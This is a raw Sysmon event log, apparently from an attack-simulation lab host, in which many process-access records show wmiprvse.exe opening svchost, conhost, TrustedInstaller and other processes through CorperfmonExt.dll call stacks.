13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006576Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006575Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006574Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006573Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006572Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006571Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006570Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006569Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006568Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006567Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006566Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006565Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006564Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006563Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006562Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006561Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006560Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006559Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006558Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006557Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006556Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006555Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006554Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.701{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006553Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 